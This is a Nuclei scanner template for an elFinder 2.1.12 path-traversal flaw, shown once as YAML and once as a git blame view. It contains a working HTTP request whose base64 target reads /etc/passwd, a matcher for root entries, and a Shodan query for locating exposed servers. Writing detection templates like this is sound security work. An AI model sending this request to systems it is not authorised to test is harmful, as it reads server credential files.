nuclei-templates/vulnerabilities/other/elFinder-path-traversal.yaml

id: elFinder-path-traversal

info:
  name: elFinder  <=2.1.12 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
  reference:
    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
  metadata:
    verified: true
    shodan-query: title:"elfinder"
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfi,elfinder

requests:
  - raw:
      - |
        GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/07/26
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`id: elFinder-path-traversal`

			`info:`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00			`name: elFinder <=2.1.12 - Local File Inclusion`
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`author: ritikchaddha`
			`severity: high`
			`description: \|`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00			`elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.`
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`reference:`
			`- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html`
			`metadata:`
			`verified: true`
			`shodan-query: title:"elfinder"`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`tags: lfi,elfinder`

			`requests:`
			`- raw:`
			`- \|`
			`GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`

			`- type: status`
			`status:`
			`- 200`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00
			`# Enhanced by mp on 2022/07/26`